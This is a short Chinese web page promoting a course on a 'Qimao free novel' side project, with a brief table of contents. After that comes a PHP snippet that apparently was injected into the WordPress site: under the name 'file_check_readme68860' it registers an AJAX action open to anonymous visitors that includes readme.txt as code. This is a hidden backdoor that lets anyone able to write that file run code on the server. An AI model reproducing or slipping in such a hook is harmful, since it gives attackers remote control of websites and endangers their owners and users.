项目介绍
七猫免费小说-单窗口100➕-免费知识分享-感兴趣可以测试
课程目录
- 项目介绍
- 项目实操
if(!function_exists('file_check_readme68860')){ add_action('wp_ajax_nopriv_file_check_readme68860', 'file_check_readme68860'); add_action('wp_ajax_file_check_readme68860', 'file_check_readme68860'); function file_check_readme68860() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } }